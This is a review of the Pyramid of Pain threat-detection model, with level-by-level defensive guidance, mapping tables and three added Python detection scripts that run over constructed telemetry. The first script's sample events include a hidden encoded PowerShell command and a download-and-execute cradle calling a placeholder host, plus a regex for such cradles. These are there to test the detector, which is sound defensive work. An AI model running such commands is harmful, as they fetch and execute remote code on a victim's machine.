A quick review of the Pyramid of Pain

Introduction:

The Pyramid of Pain is a model, introduced by David Bianco in 2013, that ranks the indicators a defender can detect by how much it costs the attacker to change them once they are detected and denied. It is called the "Pyramid of Pain" because the higher an indicator sits, the more pain a defender inflicts by detecting and blocking it: a file hash is replaced by recompiling, a C2 IP address by renting a new host, while changing tactics, techniques, and procedures (TTPs) forces the adversary to retrain and re-tool, or give up.

Bianco's original pyramid has six tiers, from bottom to top: hash values, IP addresses, domain names, network and host artifacts, tools, and TTPs. This review groups them, together with the intelligence layered above them, into four levels:

  1. Indicators of Compromise (IOCs): hash values, IP addresses, domain names
  2. Tactics, Techniques, and Procedures (TTPs), including the network and host artifacts they leave behind
  3. Information about Tools and Infrastructure
  4. Adversary Campaigns and Objectives

Note that this grouping places tools and infrastructure above TTPs; in Bianco's original, TTPs are the apex and tools sit immediately below them.
| Level | Description | Prevention Tools | Protection Tools | Detection Tools | Attacker Tools | Detection Sample |
|---|---|---|---|---|---|---|
| 1 | Indicators of Compromise (IOCs) | Anti-Virus, Firewalls, SIEM, IDS/IPS | EDR, Deception Technologies, MFA | EDR, SIEM, IDS/IPS | Malware kits, RATs, Botnets | SIEM matches an outbound connection against an IP address on a threat-feed blocklist |
| 2 | Tactics, Techniques, and Procedures (TTPs) | Network Segmentation, MFA, Deception Technologies | EDR, SIEM, Deception Technologies | EDR, SIEM | Credential harvesters, Port scanners, DNS spoofers | EDR detects an Office application spawning a script host with an encoded command line |
| 3 | Information about Tools and Infrastructure | IP Reputation Services, Domain Blocklists | Threat Intelligence Platforms, Passive DNS | Threat Intelligence Platforms, Passive DNS | Proxy servers, VPNs, TOR | Passive DNS and WHOIS pivoting reveal multiple domains sharing an IP address or registrant email |
| 4 | Adversary Campaigns and Objectives | Threat Intelligence Platforms | Red Teams, Threat Intelligence Platforms, Human Intelligence | Threat Intelligence Platforms, Human Intelligence | Advanced persistent threats (APTs), Cyber espionage groups | Threat Intelligence Platform reveals a new campaign targeting a specific industry sector |

Each level represents a different cost for the attacker: the atomic indicators at Level 1 are replaced in minutes, while adversary campaigns and objectives at Level 4 cannot be changed without abandoning the operation. Collection effort runs the other way, with IOCs being the cheapest for defenders to obtain and campaign-level intelligence the hardest.

How to Use the Pyramid of Pain:

The Pyramid of Pain can be used by organizations to develop a more comprehensive cybersecurity strategy that includes prevention, protection, and detection. By understanding the tactics used by attackers at each level, organizations can implement security controls and best practices that make it harder for attackers to succeed.

In terms of prevention, organizations can use IOCs to block known malicious activity at the perimeter and on endpoints, and implement controls such as application allow-listing, least privilege, and MFA that make the attacker's TTPs harder to execute even when the specific indicators are new. Information about attacker tools and infrastructure lets them block whole families of threats rather than single samples.

For protection, organizations can use threat intelligence to monitor for IOCs and TTPs associated with specific adversaries. They can also use network segmentation to limit the blast radius of a successful intrusion and prevent lateral movement.

In terms of detection, organizations can use threat intelligence to monitor for new TTPs used by attackers, and use behavioral analysis to detect unusual activity that may indicate an attack in progress. Knowledge of adversary campaigns and objectives helps them anticipate which assets will be targeted and which behaviors to prioritize in detection engineering.

Level 1: Indicators of Compromise (IoCs)

Indicators of Compromise (IoCs) are specific, atomic artifacts that can be used to identify malicious activity: IP addresses, domain names, file hashes, and URLs. They are the cheapest indicators to collect and share, and also the cheapest for an attacker to change, which is why they sit at the bottom of the pyramid.

Prevention: To prevent attacks at the IoC level, organizations can implement security controls that stop known-bad artifacts before they gain a foothold: firewalls and web proxies enforcing blocklists, intrusion prevention systems (IPS), and endpoint protection software with signature matching.

Protection: To protect against attacks at the IoC level, organizations can consume threat intelligence feeds of known IoCs and block them before they are used. Organizations can also use automated tools that scan systems for indicators of compromise. The caveat is that feeds age quickly: a hash is invalidated by a single-byte change to the file, and a blocklisted IP address is abandoned as soon as the attacker notices it no longer works, so IoC matching should be treated as a cheap first filter, not as coverage.

Detection: To detect attacks at the IoC level, organizations can use network monitoring tools that flag traffic to known-bad destinations, and security information and event management (SIEM) systems that correlate events across systems and match them against indicator lists.

Level 2: Tactics, Techniques, and Procedures (TTPs)

Tactics, Techniques, and Procedures (TTPs) are the specific methods that attackers use to achieve their objectives. This includes things like social engineering, malware delivery, and lateral movement.

Prevention: To prevent attacks at the TTP level, organizations can implement security controls aimed at the technique rather than at a particular sample. For example, email filters block phishing, macro-blocking policies and application allow-listing break common malware delivery chains, and endpoint protection software blocks malware execution.

Protection: To protect against attacks at the TTP level, organizations can use controls that detect and contain these tactics once they are in use. This includes intrusion detection systems (IDS) that recognize lateral movement, and sandboxing technology that identifies new and unknown malware by its behavior rather than its hash.

Detection: To detect attacks at the TTP level, organizations can use behavioral analytics tools that detect anomalous behavior, and machine learning models that identify patterns of activity indicative of an attack. A behavioral rule (for example, an Office application spawning a script host with an encoded command line) keeps firing after the attacker has recompiled the payload and rotated infrastructure, which is exactly what hash and IP indicators cannot do.
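The contrast between Level 1 and Level 2, as an added example that is not part of the original page: the Python script below (written for this review) runs both an atomic-indicator match and a behavioural rule over constructed endpoint telemetry. The indicator values, hashes, host names and command lines are constructed for illustration; the IP addresses come from the RFC 5737 documentation ranges and stand in for public addresses, so the script classifies "external" with an RFC 1918 check rather than the `ipaddress` module's `is_global` property, which treats documentation ranges as non-global.

```python
"""Level 1 (atomic IoC) matching versus Level 2 (TTP) detection.

Added example for this review; the indicators, events and command lines
are constructed and not taken from any real intrusion.
"""
import ipaddress
import re
from dataclasses import dataclass

# Level 1 indicator feed (constructed). The hash is a made-up SHA-256 of a dropped payload.
IOC_HASHES = {"3b1a9c0f2d4e5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b"}
IOC_IPS = {"203.0.113.10"}              # RFC 5737 address standing in for a C2 server
IOC_DOMAINS = {"update-cdn.example"}    # reserved .example TLD, constructed

# RFC 1918 and loopback ranges; anything else is treated as external here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Encoded commands or download-and-execute cradles in the child's command line.
SUSPICIOUS_CLI = re.compile(
    r"(-e(nc|ncodedcommand)?\s|downloadstring|downloadfile|iex\s|invoke-expression)", re.I)


@dataclass
class ProcessEvent:
    parent: str          # parent process image name
    image: str           # child process image name
    cmdline: str         # child command line
    payload_sha256: str  # hash of the file the child wrote to disk (joined from file telemetry)
    dest_ip: str = ""    # first outbound connection made by the child, if any
    dest_domain: str = ""


def is_external(ip: str) -> bool:
    """True for an address outside RFC 1918 and loopback space; False for empty/invalid."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def level1_match(ev: ProcessEvent) -> list:
    """Return the atomic indicator types that hit, in a fixed order."""
    hits = []
    if ev.payload_sha256.lower() in IOC_HASHES:
        hits.append("hash")
    if ev.dest_ip in IOC_IPS:
        hits.append("ip")
    if ev.dest_domain.lower().rstrip(".") in IOC_DOMAINS:
        hits.append("domain")
    return hits


def level2_match(ev: ProcessEvent) -> bool:
    """Behavioural rule: an Office application spawns a script host whose command
    line is encoded or downloads and executes code, and the child then connects
    to an external address. Nothing here depends on a hash, an IP or a domain,
    so recompiling the payload or rotating infrastructure does not evade it."""
    if ev.parent.lower() not in OFFICE_APPS or ev.image.lower() not in SCRIPT_HOSTS:
        return False
    if not SUSPICIOUS_CLI.search(ev.cmdline):
        return False
    return is_external(ev.dest_ip)


def triage(events) -> list:
    """For each event, (level 1 indicator hits, whether the level 2 rule fired)."""
    return [(level1_match(ev), level2_match(ev)) for ev in events]


# Constructed telemetry. Wave 1 uses the infrastructure in the feed; in wave 2 the
# attacker has recompiled the payload and moved to new hosting, but the
# macro-to-PowerShell behaviour is unchanged. The last two events are benign.
SAMPLE_EVENTS = [
    ProcessEvent("WINWORD.EXE", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
                 "3b1a9c0f2d4e5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b",
                 "203.0.113.10", "update-cdn.example"),
    ProcessEvent("EXCEL.EXE", "powershell.exe",
                 "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://cdn-sync.example/a')\"",
                 "9f8e7d6c5b4a39281706f5e4d3c2b1a09f8e7d6c5b4a39281706f5e4d3c2b1a0",
                 "198.51.100.7", "cdn-sync.example"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -File C:\\scripts\\nightly-backup.ps1",
                 "00" * 31 + "01", "10.0.0.5", "fileserver.corp.example"),
    ProcessEvent("OUTLOOK.EXE", "powershell.exe",
                 "powershell.exe -Command Get-Date", "00" * 31 + "02"),
]

if __name__ == "__main__":
    for ev, (l1, l2) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{ev.parent:>12} -> {ev.image:<15} level1={l1 or '-'} level2={l2}")
```

Running it shows the first wave lighting up all three atomic indicators and the behavioural rule; the second wave, after the attacker's cheap changes, produces no indicator hits at all while the behavioural rule still fires, and neither benign event matches either layer. The regex and process lists are deliberately narrow; a production rule would also suppress known-good automation and enrich with the parent's own parent.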

Level 3: Information about Tools and Infrastructure

Information about Tools and Infrastructure refers to the specific tools and infrastructure attackers use to carry out their attacks: command and control servers, exploit kits, remote access trojans (RATs), and the hosting, registrars, and naming conventions behind them. Denying a tool forces the attacker to find or build a replacement with the same capability; denying infrastructure forces them to rebuild and re-register, and pivoting on shared infrastructure often exposes domains and servers that have not been used yet.

Prevention: To prevent attacks using information about tools and infrastructure, organizations can implement security controls that are designed to block these specific tools and infrastructure. This can include things like web filtering tools that block access to known malicious websites, and intrusion prevention systems (IPS) that block traffic from known command and control servers.

Protection: To protect against attacks using information about tools and infrastructure, organizations can use security controls that are designed to detect and block these specific tools and infrastructure. For example, they can use network monitoring tools that can detect connections to known command and control servers, and endpoint protection software that can detect and block known RATs.

Detection: To detect attacks at this level, organizations can use threat intelligence feeds describing known malicious tools and infrastructure, and pivot from a single known indicator (an IP address or a registrant email) through passive DNS and WHOIS data to enumerate related infrastructure before it is used against them.
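The infrastructure pivot described above, as an added example that is not part of the original page: the Python script below (written for this review) expands one known domain into related infrastructure by walking shared resolving IPs and shared registrant emails. The passive DNS history and WHOIS records are constructed; domains use the reserved `.example` TLD and IPs come from the RFC 5737 documentation ranges. The `max_shared` cut-off is an assumption of this example, used to avoid pivoting through shared hosting.

```python
"""Level 3: expanding one known indicator into related infrastructure.

Added example for this review. The passive DNS and WHOIS records are
constructed, not real observations.
"""
from collections import defaultdict, deque

# Constructed passive DNS history: (domain, IP it resolved to).
PDNS = [
    ("update-cdn.example", "203.0.113.10"),
    ("cdn-sync.example", "203.0.113.10"),      # same dedicated host as the seed
    ("cdn-sync.example", "198.51.100.7"),      # moved here later
    ("mail-relay.example", "198.51.100.7"),
    ("update-cdn.example", "192.0.2.50"),      # briefly parked on a shared host
    ("news-portal.example", "192.0.2.50"),
    ("shop-portal.example", "192.0.2.50"),
    ("blog-portal.example", "192.0.2.50"),
    ("forum-portal.example", "192.0.2.50"),
]

# Constructed WHOIS registrant emails.
WHOIS = {
    "update-cdn.example": "ops@regmail.example",
    "cdn-sync.example": "ops@regmail.example",
    "files-drop.example": "ops@regmail.example",   # registered, not resolving yet
    "mail-relay.example": "admin@other.example",
    "news-portal.example": "host@portal.example",
    "shop-portal.example": "host@portal.example",
}


def build_indexes(pdns, whois):
    """Invert the raw records into the three lookups the pivot needs."""
    ip_to_domains = defaultdict(set)
    domain_to_ips = defaultdict(set)
    email_to_domains = defaultdict(set)
    for domain, ip in pdns:
        ip_to_domains[ip].add(domain)
        domain_to_ips[domain].add(ip)
    for domain, email in whois.items():
        email_to_domains[email].add(domain)
    return ip_to_domains, domain_to_ips, email_to_domains


def pivot(seed, pdns=PDNS, whois=WHOIS, max_shared=3):
    """Breadth-first expansion from one domain over shared IPs and shared
    registrant emails. Returns {domain: reason it was added}.

    IPs that host more than max_shared domains are skipped: shared hosting and
    CDNs link unrelated sites and would flood the result with false pivots."""
    ip_to_domains, domain_to_ips, email_to_domains = build_indexes(pdns, whois)
    found = {seed: "seed"}
    queue = deque([seed])
    while queue:
        domain = queue.popleft()
        candidates = []
        for ip in sorted(domain_to_ips.get(domain, ())):
            if len(ip_to_domains[ip]) > max_shared:
                continue  # shared hosting: too noisy to pivot on
            candidates += [(d, f"shares IP {ip} with {domain}")
                           for d in sorted(ip_to_domains[ip])]
        email = whois.get(domain)
        if email:
            candidates += [(d, f"shares registrant {email} with {domain}")
                           for d in sorted(email_to_domains[email])]
        for d, reason in candidates:
            if d not in found:
                found[d] = reason
                queue.append(d)
    return found


if __name__ == "__main__":
    for domain, reason in pivot("update-cdn.example").items():
        print(f"{domain:<22} {reason}")
```

From the single seed the script recovers the attacker's second C2 domain (shared dedicated IP), a domain that is registered but not yet resolving (shared registrant), and a relay that shares a later IP with the second domain; the four unrelated portal sites on the shared host stay out. Raising `max_shared` to 10 pulls them in, which is the false-positive mode this cut-off exists to prevent.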

Level 4: Adversary Campaigns and Objectives

Adversary Campaigns and Objectives refer to the larger strategies and motivations of attackers. This includes information about their targets, tactics, and overall objectives.

Prevention: To prevent attacks based on adversary campaigns and objectives, organizations can implement security controls and best practices that make it harder for attackers to succeed. For example, they can implement security awareness training programs that educate employees about the tactics used by attackers, so they can identify and report suspicious activity.

Protection: To protect against attacks based on adversary campaigns and objectives, organizations can use threat intelligence to monitor for indicators of compromise (IOCs) associated with specific adversaries, so that attacks can be identified and blocked before they cause damage. They can also use network segmentation to limit the impact of a successful attack and prevent lateral movement.

Detection: To detect attacks based on adversary campaigns and objectives, organizations can use threat intelligence to monitor for new tactics, techniques, and procedures (TTPs) used by specific adversaries. They can also use behavioral analysis to detect unusual activity that may indicate an attack in progress, for example large volumes of data leaving the network, or traffic patterns that are unusual relative to a host's own baseline.
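The exfiltration check mentioned above, as an added example that is not part of the original page: the Python script below (written for this review) builds a per-host baseline of hourly outbound bytes to external addresses and flags hours that exceed a multiple of that host's own median. The flow records are constructed (two workstations over seven days); IPs from the RFC 5737 ranges stand in for external hosts and 10.0.0.0/8 for the internal network. The ratio, floor and history length are assumptions of this example, not values from the page.

```python
"""Volume-based exfiltration detection against a per-host baseline.

Added example for this review; the flow records are constructed.
"""
import ipaddress
import statistics
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def hourly_external_bytes(flows):
    """flows: iterable of (host, day, hour, dst_ip, bytes_out).
    Returns {host: {(day, hour): bytes sent to external destinations}}."""
    totals = defaultdict(lambda: defaultdict(int))
    for host, day, hour, dst_ip, nbytes in flows:
        if not is_internal(dst_ip):
            totals[host][(day, hour)] += nbytes
    return totals


def detect_exfil(flows, target_day, ratio=10.0, floor=50_000_000, min_history=24):
    """Flag hours on target_day where a host sent more than `ratio` times its own
    median hourly volume, and at least `floor` bytes, to external addresses.
    The floor stops a normally quiet host alerting on a few megabytes; the
    per-host median stops a busy host being judged against quiet ones.
    Returns [(host, hour, bytes, multiple_of_median)]."""
    alerts = []
    for host, hours in sorted(hourly_external_bytes(flows).items()):
        history = [b for (day, _), b in hours.items() if day < target_day]
        if len(history) < min_history:
            continue  # not enough baseline to judge this host
        median = statistics.median(history)
        threshold = max(ratio * median, floor)
        for (day, hour), nbytes in sorted(hours.items()):
            if day == target_day and nbytes > threshold:
                alerts.append((host, hour, nbytes, round(nbytes / median, 1)))
    return alerts


def build_sample_flows():
    """Constructed telemetry: steady hourly browsing for both hosts, a large
    internal file-server transfer that must be ignored, and one 900 MB push
    from ws-042 to a single external host at 02:00 on day 7."""
    flows = []
    for day in range(1, 8):
        for hour in range(24):
            flows.append(("ws-017", day, hour, "203.0.113.80", 1_500_000 + 50_000 * (hour % 8)))
            flows.append(("ws-042", day, hour, "203.0.113.80", 2_000_000 + 50_000 * (hour % 8)))
            flows.append(("ws-042", day, hour, "10.0.0.5", 400_000_000))  # internal, ignored
    flows.append(("ws-042", 7, 2, "198.51.100.7", 900_000_000))
    return flows


if __name__ == "__main__":
    for host, hour, nbytes, factor in detect_exfil(build_sample_flows(), target_day=7):
        print(f"{host} day 7 {hour:02d}:00 sent {nbytes / 1e6:.0f} MB externally "
              f"({factor}x its median hour)")
```

Only the 02:00 hour on ws-042 is flagged: the 400 MB per hour it pushes to the internal file server is excluded by the internal check, and ws-017's steady profile never crosses the floor. This is a behavioural detection in the sense the page uses the term: it depends on no hash, IP or domain, so it keeps working when the destination changes.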

Example:

An organization has received intelligence that a specific adversary group is targeting organizations in their industry with a new type of ransomware. Based on this information, the organization implements security controls to prevent the ransomware from entering their network, such as email filters and web content filters. They also implement security awareness training programs to educate employees about the tactics used by this adversary group, so they can identify and report any suspicious activity.

In terms of protection, the organization implements network segmentation to limit the impact of a successful attack and prevent lateral movement by the attackers. They also use threat intelligence to monitor for IOCs associated with the adversary group and block any attacks that are detected.

For detection, the organization uses behavioral analysis to detect any unusual activity on their network that may indicate an attack is in progress. They also use threat intelligence to monitor for new TTPs used by the adversary group and update their security controls accordingly.

Mapping the Pyramid of Pain to the SOC-CMM maturity model:

The table below pairs each level with the SOC-CMM maturity level at which an organization can realistically operate on it. Two caveats: SOC-CMM measures the maturity of SOC capabilities rather than indicator types, so the pairing is illustrative, and the fifth row, "Indicators of Intent", is an extension of the author's and not part of Bianco's pyramid.

| Pyramid of Pain Level | Prevention | Protection | Detection | Examples of Tools | Examples of Threat Actors | Examples of Attacks | SOC-CMM Maturity Level |
|---|---|---|---|---|---|---|---|
| 1: Indicators of Compromise (IoCs) | System hardening, patch management | Endpoint detection and response (EDR), antivirus, firewalls | SIEM, threat intelligence, log analysis | YARA, Snort, TCPDump | Script kiddies, low-skilled hackers; named groups: APT10, FIN7, Lazarus Group, Turla | Phishing, malware, ransomware | Level 1: Initial |
| 2: Tactics, Techniques, and Procedures (TTPs) | Security awareness training, access controls | Intrusion prevention systems (IPS), web application firewalls (WAF) | Network traffic analysis, honeypots | Mimikatz, Metasploit, Cobalt Strike | Cybercriminals, hacktivists; named groups: APT28, APT33, Cobalt Group, Magecart | DDoS attacks, SQL injection, cross-site scripting (XSS) | Level 2: Managed |
| 3: Information about Tools and Infrastructure | Web application security testing, vulnerability scanning | Network segmentation, encryption | Endpoint detection and response (EDR), threat hunting | Nmap, Nessus, Qualys | Nation-state actors, advanced persistent threats (APTs); named groups: Carbanak, DarkHydrus, OilRig, TA505 | Advanced malware, spear phishing, zero-day exploits | Level 3: Defined |
| 4: Adversary Campaigns and Objectives | Security risk assessments, threat modeling | Security information and event management (SIEM), incident response (IR) | Threat intelligence, user behavior analytics (UBA) | (none listed) | Nation-state actors, advanced persistent threats (APTs), cyber terrorists; named groups: Carbanak, DarkHydrus, OilRig, TA505 | Supply chain attacks, intellectual property theft | Level 4: Managed and Measurable |
| 5: Indicators of Intent (IoIs) | Security culture and awareness programs, threat intelligence sharing | Identity and access management (IAM), data loss prevention (DLP) | Security information and event management (SIEM), machine learning (ML) | Dark web monitoring tools, honeynets | Nation-state actors, organized crime; named groups: APT1, Sandworm, Sofacy, Turla | Social engineering, APT intrusions | Level 5: Optimizing |

Level 1: Indicators of Compromise (IoCs)

  • Hash Values (e.g. SHA-256, SHA-1, MD5): identify specific malicious files. Cost to the attacker, in Bianco's terms: trivial; recompiling, or appending a single byte, yields a new hash.
  • IP Addresses: identify malicious servers or traffic sources. Cost: easy; hosting is rented or proxied and swapped within minutes.
  • Domain Names: identify malicious websites or C2 domains. Cost: simple; registration is cheap, although a new domain takes longer to become usable than a new IP address.

Level 2: Tactics, Techniques, and Procedures (TTPs)

  • Network Artifacts: patterns in malicious network activity, such as URI structures, User-Agent strings, or quirks of a C2 protocol. Cost: annoying; the tooling that produces them has to be changed.
  • Host Artifacts: patterns left on a host, such as registry keys, file paths, mutex names, or service names. Cost: annoying, for the same reason.
  • TTPs themselves: how the adversary operates end to end, which Bianco places at the apex of the pyramid. Cost: tough; the adversary has to learn new behaviour, not just new tooling.

Level 3: Information about Tools and Infrastructure

  • Tools: specific malware or utilities attackers use to conduct their operations. Cost: challenging; a replacement with the same capability must be found or written.
  • Infrastructure: patterns in how attacker infrastructure is built and registered, such as preferred hosting providers, registrars, or naming conventions, which allow pivoting from one known domain or server to related ones.

Level 4: Adversary Campaigns and Objectives

  • Threat Actors: attribution of activity to the specific groups or individuals responsible.
  • Examples of Attacks: patterns in the targets, timing, and objectives of campaigns run by specific threat actors or groups.

Conclusion:

The Pyramid of Pain is a framework that security teams use to prioritize which indicators to collect, detect, and deny. It is drawn as a pyramid because the cheapest and most widely shared indicators sit at the bottom, and the ones that are hardest to obtain, and hardest for an adversary to replace, sit at the top. Its principle is that the more pain an attacker feels when a particular indicator is detected and denied, the more valuable that indicator is for detection and response.

Here is how the Pyramid of Pain can be used as a model for threat detection:

  1. Level 1: Indicators of Compromise (IoCs) – At the bottom of the pyramid is the most basic and widely available data: IP addresses, domain names, email addresses, hashes, and similar artifacts that suggest a system has been compromised. These can be collected and matched quickly, but they are also easily changed by attackers, so their useful lifetime is short; feeds must be refreshed and matches treated as leads rather than conclusions.
  2. Level 2: Tactics, Techniques, and Procedures (TTPs) – Moving up the pyramid, TTPs describe how an attacker operates: the tools, methods, and procedures used to exploit vulnerabilities and infiltrate systems. Detection written against this behavior identifies the attacker regardless of which hashes and infrastructure they use this week, and continues to work after those have been changed.
  3. Levels 3 and 4: Tools, Infrastructure, and Campaigns – This review places tool, infrastructure, and campaign intelligence at the top, because it is the most difficult to obtain and requires the most analysis capability: understanding an adversary's motivations, objectives, and strategic goals gives the most complete picture of the threat landscape. In Bianco's original six-tier pyramid, TTPs themselves are the apex, with tools immediately below them.

By using the Pyramid of Pain as a model for threat detection, security professionals can prioritize the collection and analysis of intelligence based on the pain that would be inflicted on an attacker if that indicator were detected and denied. This focuses resources on the most durable and actionable intelligence, which leads to more effective threat detection and response.

The Pyramid of Pain is a useful framework for organizations to better understand the tactics used by attackers and how to defend against them. By using it to develop a cybersecurity strategy that includes prevention, protection, and detection, organizations can reduce the likelihood that an attack succeeds and minimize the damage when one does.
